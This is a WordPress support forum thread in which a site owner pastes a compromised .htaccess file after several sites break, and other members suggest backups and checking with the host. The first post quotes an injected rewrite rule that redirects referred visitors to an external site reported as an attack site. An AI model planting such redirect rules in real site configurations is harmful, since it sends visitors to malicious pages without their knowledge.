Forums

[resolved] Broken images/layout - hacked .htaccess (6 posts)

  1. jimannajmi
    Member
    Posted 3 months ago #

    Hi guys,

    I have a few websites under one hosting, and they are all wordpress-based. I just checked yesterday that all of my websites have broken images and layout, you can see them here;

    http://www.jimannajmi.com
    http://www.alpha-lipid.org
    http://www.hanifazman.com
    http://www.justinbridle.com
    http://www.perodua-baru.com

    I checked the .htaccess files, and they all have the same lines;

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
    RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
    RewriteRule ^.*$ http://blackfriday-shopping.com/mhhi.html?h=1260301 [L,R]
    </IfModule>
    
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    
    # END WordPress

    I dont know where the line "http://blackfriday-shopping.com/mhhi.html?h=1260301" comes from, but I suspect it's the source of the problem. I've tried deleted the lines but the problem persist. Please advise me on what to do.

    Thanks.

    -Jiman

  2. pete_398
    Member
    Posted 3 months ago #

    I visited the black friday site, and firefox told me it was a reported attack site.

    So, hope you have a recent backup. I'd suggest you restore one of the sites, to see if the problem persists.

  3. jimannajmi
    Member
    Posted 3 months ago #

    That's the problem, I don't have backups. Is there any way to fix this?

  4. Andrew Nevins
    Volunteer Moderator
    Posted 3 months ago #

    Have you asked your hosting provider whether they backup?

  5. WPyogi
    Volunteer Moderator
    Posted 3 months ago #

  6. jimannajmi
    Member
    Posted 3 months ago #

    Thank you guys for the support. I have already got the issue resolved, thanks to a guy from fiverr. For those who are having the same problem, you can ask help from this guy;

    http://fiverr.com/lostartist/get-rid-of-malware-from-your-website-or-wordpress-blog

    I'm in no way affiliated with this guy, but he does it well and quick. Thanks again to all.

Reply

You must log in to post.

About this Topic